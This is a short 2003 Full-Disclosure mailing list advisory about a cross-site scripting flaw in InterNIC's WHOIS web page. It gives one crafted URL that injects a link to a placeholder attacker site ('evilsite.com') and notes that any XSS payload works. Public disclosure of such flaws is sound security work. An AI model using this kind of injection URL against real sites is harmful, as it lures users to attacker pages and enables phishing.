[Full-Disclosure] INTERNIC WHOIS untrusted link XSS

morning_wood se_cur_ity at hotmail.com
Thu Oct 2 11:52:12 BST 2003


untrusted link XSS ...
http://www-whois.internic.net/cgi/whois?whois_nic=%3Ca+href%3Dhttp%3A%2F%2Fe
vilsite.com%3Eclick%20here%20for%20results%3C%2Fa%3E&type=domain

or any xss you wish to embed is also OK
morning_wood ( XSS king )




Full-Disclosure is hosted and sponsored by Secunia.